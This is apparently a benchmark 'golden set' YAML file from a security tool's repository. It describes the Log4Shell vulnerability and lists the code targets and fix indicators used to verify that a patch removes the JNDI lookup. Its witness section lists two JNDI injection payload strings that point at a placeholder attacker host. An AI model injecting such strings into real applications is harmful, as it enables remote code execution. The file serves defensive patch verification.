git.stella-ops.org/bench/golden-corpus/golden-sets/CVE-2021-44228.golden.yaml
master 7f7eb8b228 Complete batch 012 (golden set diff) and 013 (advisory chat), fix build errors
Sprints completed:
- SPRINT_20260110_012_* (golden set diff layer - 10 sprints)
- SPRINT_20260110_013_* (advisory chat - 4 sprints)

Build fixes applied:
- Fix namespace conflicts with Microsoft.Extensions.Options.Options.Create
- Fix VexDecisionReachabilityIntegrationTests API drift (major rewrite)
- Fix VexSchemaValidationTests FluentAssertions method name
- Fix FixChainGateIntegrationTests ambiguous type references
- Fix AdvisoryAI test files required properties and namespace aliases
- Add stub types for CveMappingController (ICveSymbolMappingService)
- Fix VerdictBuilderService static context issue

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-01-11 10:09:07 +02:00

# Golden Set: CVE-2021-44228 (Log4Shell)
# Apache Log4j Remote Code Execution Vulnerability
#
# Sprint: SPRINT_20260110_012_010_TEST
# Task: GTV-001 - High-profile Golden Sets
#
# This golden set defines the vulnerability targets for CVE-2021-44228,
# allowing binary-level verification that a patch eliminates JNDI lookup.
id: "CVE-2021-44228"
version: "1.0.0"
created: "2026-01-11T12:00:00Z"
author: "stellaops-security"
status: "approved"
# Component identification
component:
  name: "log4j-core"
  ecosystem: "maven"
  affectedVersions:
    - ">=2.0-beta9,<2.15.0"
# Vulnerability details
vulnerability:
  cveId: "CVE-2021-44228"
  aliases:
    - "Log4Shell"
    - "LogJam"
  severity: "CRITICAL"
  cvssScore: 10.0
  description: |
    Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages,
    and parameters do not protect against attacker controlled LDAP and other
    JNDI related endpoints. An attacker who can control log messages or log
    message parameters can execute arbitrary code loaded from LDAP servers
    when message lookup substitution is enabled.
  references:
    - url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
      title: "NVD Entry"
    - url: "https://logging.apache.org/log4j/2.x/security.html"
      title: "Apache Security Advisory"
# Vulnerability targets
targets:
  - function: "lookup"
    className: "org/apache/logging/log4j/core/lookup/JndiLookup"
    symbolPattern: "org/apache/logging/log4j/core/lookup/JndiLookup.lookup"
    description: "JNDI lookup method - allows remote code execution"
    criticalEdges:
      - from: "method_entry"
        to: "jndi_context_lookup"
        description: "Entry to JNDI context lookup"
    sinks:
      - "javax/naming/Context.lookup"
      - "javax/naming/InitialContext.<init>"
    expectedPatchBehavior: "disable_jndi_lookup"
  - function: "format"
    className: "org/apache/logging/log4j/core/pattern/MessagePatternConverter"
    symbolPattern: "org/apache/logging/log4j/core/pattern/MessagePatternConverter.format"
    description: "Message pattern converter - triggers lookup substitution"
    criticalEdges:
      - from: "format_entry"
        to: "substitute_call"
        description: "Entry to variable substitution"
    sinks:
      - "org/apache/logging/log4j/core/lookup/StrSubstitutor.replace"
    expectedPatchBehavior: "disable_lookup_substitution"
  - function: "resolveVariable"
    className: "org/apache/logging/log4j/core/lookup/StrSubstitutor"
    symbolPattern: "org/apache/logging/log4j/core/lookup/StrSubstitutor.resolveVariable"
    description: "Variable resolver - invokes JNDI lookup"
    criticalEdges:
      - from: "resolve_entry"
        to: "interpolator_lookup"
        description: "Entry to interpolator lookup"
    sinks:
      - "org/apache/logging/log4j/core/lookup/Interpolator.lookup"
    expectedPatchBehavior: "add_jndi_filter"
# Witness data
witness:
  command: "java -Dlog4j2.formatMsgNoLookups=false -jar target.jar"
  inputs:
    - name: "jndi_ldap_payload.txt"
      description: "Log message with JNDI LDAP lookup"
      content: "${jndi:ldap://attacker.com/a}"
      trigger: "jndi_ldap_lookup"
    - name: "jndi_rmi_payload.txt"
      description: "Log message with JNDI RMI lookup"
      content: "${jndi:rmi://attacker.com/a}"
      trigger: "jndi_rmi_lookup"
# Verification criteria
verification:
  fixIndicators:
    - type: "class_removed"
      className: "org/apache/logging/log4j/core/lookup/JndiLookup"
      description: "JNDI lookup class removed (2.17.0+)"
    - type: "method_disabled"
      location: "JndiLookup.lookup"
      description: "Lookup returns null or throws"
    - type: "feature_flag"
      flag: "log4j2.formatMsgNoLookups"
      defaultValue: "true"
      description: "Lookup disabled by default (2.15.0+)"
    - type: "protocol_filter"
      allowedProtocols: ["java", "ldap", "ldaps"]
      description: "Protocol allowlist (2.15.0+)"
  expectedConfidence:
    fixed: 0.98
    partial: 0.75
    inconclusive: 0.40
# Metadata
metadata:
  reviewedBy: "security-team"
  reviewedAt: "2026-01-11T12:00:00Z"
  approvedFor: "production"
  kev: true # Known Exploited Vulnerability
  cisa_due: "2021-12-24"
  tags:
    - "rce"
    - "jndi"
    - "log-injection"
    - "critical"
    - "kev"